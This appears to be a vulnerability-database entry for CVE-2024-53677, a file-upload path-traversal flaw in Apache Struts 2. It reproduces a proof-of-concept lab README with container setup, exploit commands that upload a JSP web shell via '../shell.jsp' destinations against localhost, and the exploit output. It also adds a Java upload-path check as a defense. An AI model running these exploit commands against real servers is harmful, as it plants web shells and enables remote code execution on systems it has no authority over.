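Related vulnerability
Title:
Apache Struts security vulnerability
(CVE-2024-53677)
Description: Apache Struts is an open-source project of the Apache Software Foundation (US). It is an open-source MVC framework for building enterprise Java web applications and is provided mainly as two framework versions, Struts 1 and Struts 2. Apache Struts versions from 2.0.0 up to, but not including, 6.4.0 contain a security vulnerability that stems from a flaw in the file upload logic.
Description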
Vulnerable Environment and Exploit for CVE-2024-53677
Introduction
CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment
This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.
## Setup Instructions
The environment can be built and run using Podman. Follow these steps to set up the application:
```sh
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit:
```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file uploads successfully but is not accessible afterwards. To work around this, add an extra `.` to the destination (`.../shell.jsp`), run the upload, then re-run the original command:
```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp
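
For the server side, the following is an added example (not code from this repository or from Apache Struts) of a defense-in-depth check that an upload action can apply at the point where it builds the storage path, so that destinations such as the `../shell.jsp` and `.../shell.jsp` values used above are refused. The class name `UploadPathCheck`, the method `safeTarget` and the extension allowlist are assumptions made for illustration; the check does not replace moving off the affected versions listed at the top of this page.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;

// Hypothetical helper: decides where an upload may be stored, given an
// untrusted, client-supplied file name.
public class UploadPathCheck {
    // Assumption: only these extensions are legitimate for the application.
    private static final Set<String> ALLOWED = Set.of("png", "jpg", "pdf", "txt");

    /** Returns the storage path inside baseDir, or throws if the name is unsafe. */
    static Path safeTarget(Path baseDir, String clientName) {
        // A stored name must be a single path component: reject separators and NUL.
        if (clientName == null || clientName.isEmpty()
                || clientName.contains("/") || clientName.contains("\\")
                || clientName.indexOf('\0') >= 0) {
            throw new SecurityException("path separator in file name");
        }
        // Allowlist the extension so server-executable types (.jsp) are never stored.
        int dot = clientName.lastIndexOf('.');
        String ext = dot < 0 ? "" : clientName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) {
            throw new SecurityException("extension not allowed: '" + ext + "'");
        }
        // Second line of defence: the normalised target must stay under the base.
        Path base = baseDir.toAbsolutePath().normalize();
        Path target = base.resolve(clientName).normalize();
        if (!target.startsWith(base) || target.equals(base)) {
            throw new SecurityException("target escapes upload directory");
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("uploads");
        // Constructed sample names; the two traversal forms are the ones on this page.
        String[] names = {"report.pdf", "../shell.jsp", ".../shell.jsp", "shell.jsp", ".."};
        for (String name : names) {
            try {
                System.out.println(name + " -> " + safeTarget(base, name));
            } catch (SecurityException e) {
                System.out.println(name + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Storing uploads outside the web root, under server-generated names, removes the remaining dependence on the allowlist being complete.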
File snapshot
```
[4.0K] /data/pocs/97833870b6af64d294a56b45f085952b85d3c398
├── [1.3K] context.xml
├── [ 612] Dockerfile
├── [2.3K] README.md
├── [ 512] requirements.txt
├── [5.5K] S2-067.py
├── [ 877] shell.jsp
├── [4.0K] struts-app
│   ├── [8.9K] mvnw
│   ├── [5.7K] mvnw.cmd
│   ├── [3.7K] pom.xml
│   ├── [4.0K] src
│   │   └── [4.0K] main
│   │       ├── [4.0K] java
│   │       │   └── [4.0K] org
│   │       │       └── [4.0K] trackflaw
│   │       │           └── [4.0K] example
│   │       │               └── [2.0K] Upload.java
│   │       ├── [4.0K] resources
│   │       │   └── [1.2K] struts.xml
│   │       └── [4.0K] webapp
│   │           ├── [ 219] index.html
│   │           └── [4.0K] WEB-INF
│   │               ├── [ 587] error.jsp
│   │               ├── [ 658] success.jsp
│   │               ├── [ 705] upload.jsp
│   │               └── [1.1K] web.xml
│   └── [4.0K] target
│       └── [4.0K] classes
│           ├── [4.0K] org
│           │   └── [4.0K] trackflaw
│           │       └── [4.0K] example
│           │           └── [2.5K] Upload.class
│           └── [1.2K] struts.xml
└── [ 219] tomcat-users.xml

15 directories, 19 files
```